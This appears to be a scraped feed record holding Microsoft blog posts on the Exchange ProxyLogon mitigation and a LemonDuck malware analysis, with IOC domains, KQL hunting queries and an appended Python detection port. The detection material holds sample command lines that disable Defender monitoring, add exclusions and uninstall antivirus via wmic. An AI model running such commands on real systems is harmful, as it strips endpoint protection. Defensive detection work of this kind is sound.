is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. 
To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you with the most current protections against the ever-changing threat environment. 
Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mmpc", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MMPC:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:41:38", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. 
We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as against self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it\u2019s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.\n\n## General, automatic behavior\n\nIf the initial execution begins automatically or from self-spreading methods, it typically originates from a file called _Readme.js_. 
This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.\n\nIn contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from _Readme.js_. After this, the next few actions that the attackers take, including the scheduled task creation, as well as the individual components and scripts are generally the same.\n\nOne of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.\n\nTo host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but \u201cblackball\u201d, \u201cblutea\u201d, and \u201crtsa\u201d have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.\n\nLemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives \u2013 specifically the _C:\\_ drive \u2013 to the Microsoft Defender exclusion list. 
This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. [Tamper protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) prevents these actions, but it\u2019s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.\n\nLemonDuck then attempts to automatically remove a series of other security products through _CMD.exe_, leveraging _WMIC.exe_. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name by running the following commands:\n\n\n\nCustom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.\n\nLemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat\u2019s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. 
These domains use a variety of names such as the following:\n\n * ackng[.]com\n * bb3u9[.]com\n * ttr3p[.]com\n * zz3r0[.]com\n * sqlnetcat[.]com\n * netcatkit[.]com\n * hwqloan[.]com\n * 75[.]ag\n * js88[.]ag\n * qq8[.]ag\n\nIn addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:\n\n\n\nLemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with _.ori_ file extensions:\n\n * _IF.BIN_ (used for lateral movement and privilege escalation)\n * _KR.BIN_ (used for competition removal and host patching)\n * _M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin_ (used for mining)\n\nExecutables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:\n\n\n\n## Lateral movement and privilege escalation\n\n_IF.Bin_, whose name stands for \u201cInfection\u201d, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.\n\n_IF.Bin_ attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren\u2019t already infected. 
If they aren\u2019t, a copy of _Readme.js_, as well as subcomponents of _IF.Bin_, are downloaded into the drive\u2019s home directory as hidden files.\n\nSimilarly, _IF.Bin_ attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.\n\nAnother tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a _mimi.dat_ file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. This tool\u2019s function is to facilitate credential theft for additional actions. In conjunction with credential theft, _IF.Bin_ drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.\n\nThe attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying includes 70001, 8088, 16379, 6379, 22, 445, and 1433.\n\nOther functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:\n\n\n\n## Competition removal and host patching\n\nAt installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. 
It does this via _KR.Bin_, the \u201cKiller\u201d script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\nThis \u201cKiller\u201d script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant _KR.Bin_. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called \u201cblackball\u201d, \u201cblutea\u201d, or \u201crtsa\u201d, which has been in use by all LemonDuck\u2019s infrastructures for the last year along with other task names.\n\nThe attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don\u2019t gain web shell access the way they had. 
If unmonitored, this could lead to a situation where a system no longer appears to be unpatched, so suspicious activity that occurred before patching is ignored or thought to be unrelated to the vulnerability.\n\n## Weaponization and continued impact\n\nA miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the [Phorpiex botnet](<https://www.microsoft.com/security/blog/2021/05/20/phorpiex-morphs-how-a-longstanding-botnet-persists-and-thrives-in-the-current-threat-environment/>), and other malware operators. The file uses any of the following names:\n\n * _M6.bin_\n * _M6.bin.ori_\n * _M6G.bin_\n * _M6.bin.exe_\n * _<File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN._\n\nOnce the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):\n\n\n\nOther systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continue long after initial infection, demonstrating that even a \u201csimple\u201d infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.\n\n## Comprehensive protection against a wide-ranging malware operation\n\nThe cross-domain visibility and coordinated defense delivered by [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. 
Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.\n\n### Mitigations\n\nApply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.\n\n * Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. [Learn about stopping threats from USB devices and other removable media](<https://docs.microsoft.com/windows/security/threat-protection/device-control/control-usb-devices-using-intune>).\n * Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.\n * [Turn on PUA protection](<https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/detect-block-potentially-unwanted-apps-windows-defender-antivirus>). Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. 
In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.\n * Turn on [tamper protection features](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) to prevent attackers from stopping security services.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus>) and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.\n * Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. [Turn on network protection](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/enable-network-protection>) to block connections to malicious domains and IP addresses.\n * Check your [Office 365 antispam policy](<https://docs.microsoft.com/microsoft-365/security/office-365-security/configure-your-spam-filter-policies>) and your [mail flow rules](<https://docs.microsoft.com/microsoft-365/security/office-365-security/create-safe-sender-lists-in-office-365#recommended-use-mail-flow-rules>) for allowed senders, domains and IP addresses. [Apply extra caution](<https://docs.microsoft.com/exchange/troubleshoot/antispam/cautions-against-bypassing-spam-filters>) when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations\u2014Office 365 will honor these settings and can let potentially harmful messages pass through. 
[Review system overrides in threat explorer](<https://docs.microsoft.com/microsoft-365/security/office-365-security/threat-explorer#system-overrides>) to determine why attack messages have reached recipient mailboxes.\n\n### Attack surface reduction\n\nTurn on the following attack surface reduction rules, to block or audit activity associated with this threat:\n\n * [Block executable content from email client and webmail](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-content-from-email-client-and-webmail>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block all office applications from creating child processes](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block persistence through WMI event 
subscription](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-persistence-through-wmi-event-subscription>)\n * [Block process creations originating from PSExec and WMI commands](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n\n### Antivirus detections\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * TrojanDownloader:PowerShell/LemonDuck!MSR\n * TrojanDownloader:Linux/LemonDuck.G!MSR\n * Trojan:Win32/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.A\n * Trojan:PowerShell/LemonDuck.B\n * Trojan:PowerShell/LemonDuck.C\n * Trojan:PowerShell/LemonDuck.D\n * Trojan:PowerShell/LemonDuck.E\n * Trojan:PowerShell/LemonDuck.F\n * Trojan:PowerShell/LemonDuck.G\n * TrojanDownloader:PowerShell/LodPey.A\n * TrojanDownloader:PowerShell/LodPey.B\n * Trojan:PowerShell/Amynex.A\n * Trojan:Win32/Amynex.A\n\n### Endpoint detection and response (EDR) alerts\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * LemonDuck botnet C2 domain activity\n * LemonDuck malware\n\nThe following alerts might also indicate threat activity associated with this threat. 
These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious PowerShell command line\n * Suspicious remote activity\n * Suspicious service registration\n * Suspicious Security Software Discovery\n * Suspicious System Network Configuration Discovery\n * Suspicious sequence of exploration activities\n * Suspicious Process Discovery\n * Suspicious System Owner/User Discovery\n * Suspicious System Network Connections Discovery\n * Suspicious Task Scheduler activity\n * Suspicious Microsoft Defender Antivirus exclusion\n * Suspicious behavior by cmd.exe was observed\n * Suspicious remote PowerShell execution\n * Suspicious behavior by svchost.exe was observed\n * A WMI event filter was bound to a suspicious event consumer\n * Attempt to hide use of dual-purpose tool\n * System executable renamed and launched\n * Microsoft Defender Antivirus protection turned off\n * Anomaly detected in ASEP registry\n * A script with suspicious content was observed\n * An obfuscated command line sequence was identified\n * A process was injected with potentially malicious code\n * A malicious PowerShell Cmdlet was invoked on the machine\n * Suspected credential theft activity\n * Outbound connection to non-standard port\n * Sensitive credential memory read\n\n### Advanced hunting\n\nThe LemonDuck botnet is highly varied in its payloads and delivery methods after email distribution, so it can sometimes evade alerts. You can use the advanced hunting capability in Microsoft 365 Defender and Microsoft Defender for Endpoint to surface activities associated with this threat.\n\n**NOTE:** The following sample queries let you search for a week's worth of events. 
To explore up to 30 days' worth of raw data, inspect events in your network, and locate potential LemonDuck-related indicators older than a week, go to the **Advanced Hunting** page > **Query** tab and use the calendar drop-down menu to set the query to hunt over the **Last 30 days**.\n\n**LemonDuck template subject lines**\n\nLooks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail them to contacts of the mailboxes on impacted machines. Additionally, checks whether attachments are present on the message. General attachment types to check for at present are .DOC, .ZIP or .JS, though this could be subject to change, as could the subjects themselves. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2RQUvDQBCF31nwP-ytCnroUUElxEoEUUirxWOiXRuNicSkpeCP99vJepESZnYz8-a9mdmZPlWoUq2ZNlqpUa9vHepAP3Laak2sw5zmGlTqnfsLGEdNgz_SRAtDOc4OTM-fUyuPT_WgJ93qWqea6gzsCfY_6mBKqdiYypcpVHRVRxVPzmmpjLqRIVOiO_Qy4gk8gW1ONtezzo0_x-7JOcvleiQfasNkE7gWuolcS_otbKI-zuHRH_QR82-ot3olXmpHfox6asJetlhtndbcer6wrxFTcmvhWdmmvG35rz7srGLTLvodyAF82FyHWmC5Ane89y0SUyroc837ja-WGkNjk1zqAj_VLyyp2szeAQAA&runQuery=true&timeRangeId=week>)\n\n`EmailEvents \n| where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', \n'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') \n| where AttachmentCount >= 1`\n\n**LemonDuck Botnet Registration Functions**\n\nLooks for instances of function runs with the name \u201cSIEX\u201d, which within the LemonDuck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAG2PuwrCQBRETy34D4ufIViID7ATYmFhE9yAAV9oMIgm3-7ZLQRBhvtgmJm7O6fiQc3euXCrONNwZ8iAN4GWg9zNCkxVNWovajY8uWZ2IgIj1vJt1hbZcxQzuZModUQ1_1OjqL_Jpb6le0qIviRd6O3pxoud_Tc1MePcC1b-YZv3zvoA7T5fgtwAAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceEvents \n| where ActionType == \"PowerShellCommand\" \n| where AdditionalFields =~ \"{\\\"Command\\\":\\\"SIEX\\\"}\"`\n\n**LemonDuck keyword identification**\n\nLooks for simple uses of known LemonDuck keyword variations in command lines initiated by PowerShell processes. All results should reflect Lemon_Duck behavior; however, there are variants of Lemon_Duck that might not use this term explicitly, so validate with additional hunting queries based on known TTPs. [Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAJ2NQQrCMBBF_1rwDqErBfEGrqyCUKQ3kKLFBpsojdoKHt7nbESX8pnM8P7MT65ad3nt6aU6nW1KaAWvFXVlHmukp5x6NbCOctrgeVyvyt6o40_CGtoyb9kIdrNATpkubPWWlCyxRXP6QGV__rZkDqjCO6iwnfdlA0naGX9oQn4BD2xHaK4bCSfo7Mv58Klezaq6iiQBAAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"powershell.exe\" \n| where InitiatingProcessCommandLine has_any(\"Lemon_Duck\",\"LemonDuck\")`\n\n**LemonDuck Microsoft Defender tampering**\n\nLooks for a command line event where LemonDuck or other similar malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. 
[Run query in Microsoft 365 security center.](<https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAKWRzQqCQBSFzzroHcRVgT1EpIugIKp9mFoappL9LXr4vhkNrJUQl5m53jPnnOsdX4nuyhRxrnRRabOaCKgnKnQldzTUQC_Oh1KqF5ajOWgGnim0e6Hjj8aM_EyEYLEW9o5hplRq7dhzwtFIrjYgV020VGVVEh1ap8LqufK46cpHpYa5h5lozTIqxv9MvsSx6aqE2_T0YU7pIe7hEOjJd64bPpnV-_4rV-PORCqLncAiXJ1eE_D-mJ7h-p1Xm4OZ2radQI1aSFbpDTwRAUzcAQAA&runQuery=true&timeRangeId=week>)\n\n`DeviceProcessEvents \n| where InitiatingProcessCommandLine has_all (\"Set-MpPreference\", \"DisableRealtimeMonitoring\", \"Add-MpPreference\", \"ExclusionProcess\") \n| project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp`\n\n**Antivirus uninstallation attempts**\n\nLooks for a command line event where LemonDuck or other similar malware uses wmic.exe (product where ... call uninstall /nointeractive) to silently uninstall installed security products. The query first matches the non-interactive uninstall pattern and then filters on vendor and product keywords; extend that keyword list with the security products deployed in your environment, and treat a match on any other product as a likely false positive. 
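The two tampering hunts above (the Defender tampering query and this antivirus uninstallation query), as an added Python example that is not part of the Microsoft post: it ports the KQL `has_all`/`has_any` checks to whole-term matching and runs them over a handful of constructed DeviceProcessEvents rows. The device IDs, report IDs and command lines are made up for this example, and two of the rows are deliberate near-misses that show why each rule requires every term.

```python
# Added example: Python port of the two Defender/AV tampering hunts, run
# over constructed telemetry. Not code from the Microsoft post.
import re

_TERM = re.compile(r"[A-Za-z0-9_]+")


def _terms(s):
    # KQL `has` matches whole, case-insensitive terms rather than substrings,
    # so "avp" must not fire on "avpsvc". Tokenising both sides approximates
    # that term-indexed behaviour.
    return [t.lower() for t in _TERM.findall(s)]


def has(text, needle):
    """Approximate KQL `has`: the needle's terms occur as a contiguous phrase."""
    hay, want = _terms(text), _terms(needle)
    if not want:
        return False
    return any(hay[i:i + len(want)] == want
               for i in range(len(hay) - len(want) + 1))


def has_all(text, needles):
    return all(has(text, n) for n in needles)


def has_any(text, needles):
    return any(has(text, n) for n in needles)


def defender_tampering(e):
    """Real-time monitoring disabled and an exclusion added in one command line."""
    return has_all(e["InitiatingProcessCommandLine"],
                   ["Set-MpPreference", "DisableRealtimeMonitoring",
                    "Add-MpPreference", "ExclusionProcess"])


def av_uninstall(e):
    """wmic product ... call uninstall /nointeractive aimed at a security product."""
    cmd = e["InitiatingProcessCommandLine"]
    return (e["InitiatingProcessFileName"].lower() == "wmic.exe"
            and has_all(cmd, ["product where", "name like",
                              "call uninstall", "/nointeractive"])
            and has_any(cmd, ["Kaspersky", "avast", "avp", "security",
                              "eset", "AntiVirus", "Norton Security"]))


RULES = {"LemonDuck Microsoft Defender tampering": defender_tampering,
         "Antivirus uninstallation attempts": av_uninstall}


def evaluate(events):
    """Return (DeviceId, ReportId, rule name) for every event a rule fires on."""
    hits = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits.append((e["DeviceId"], e["ReportId"], name))
    return hits


# Constructed sample telemetry (hypothetical hosts); only rows 1 and 2 should fire.
SAMPLE_EVENTS = [
    {"DeviceId": "ws01", "ReportId": 1, "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine":
         "powershell -w hidden -c \"Set-MpPreference -DisableRealtimeMonitoring 1; "
         "Add-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\m6.bin'\""},
    {"DeviceId": "ws01", "ReportId": 2, "InitiatingProcessFileName": "wmic.exe",
     "InitiatingProcessCommandLine":
         "wmic product where \"name like '%Kaspersky%'\" call uninstall /nointeractive"},
    # Same wmic shape, but removing something that is not a security product.
    {"DeviceId": "ws02", "ReportId": 3, "InitiatingProcessFileName": "wmic.exe",
     "InitiatingProcessCommandLine":
         "wmic product where \"name like '%Adobe%'\" call uninstall /nointeractive"},
    # An admin toggling real-time protection alone lacks the exclusion half.
    {"DeviceId": "ws02", "ReportId": 4, "InitiatingProcessFileName": "powershell.exe",
     "InitiatingProcessCommandLine": "Set-MpPreference -DisableRealtimeMonitoring $false"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The tokeniser is what keeps this faithful to KQL: a plain substring check would fire on `avpsvc` for `avp` and on every `Security` in a product name. Against real data, feed exported DeviceProcessEvents rows into `evaluate` instead of the inline sample.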
